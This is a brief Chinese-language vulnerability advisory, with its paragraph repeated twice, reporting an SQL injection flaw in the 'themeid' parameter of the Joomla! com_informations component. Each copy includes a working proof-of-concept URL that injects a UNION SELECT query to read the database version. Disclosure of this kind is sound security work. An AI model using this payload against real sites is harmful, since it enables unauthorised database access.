Joomla! com_informations组件代码中对'themeid'参数过滤不严谨,且程序在构造SQL查询语句之前未能充分过滤用户提交的输入,导致了SQL注入漏洞的产生。 利用方式如下: http://www.example.com/index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23
Joomla! com_informations组件代码中对'themeid'参数过滤不严谨,且程序在构造SQL查询语句之前未能充分过滤用户提交的输入,导致了SQL注入漏洞的产生。 利用方式如下: http://www.example.com/index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23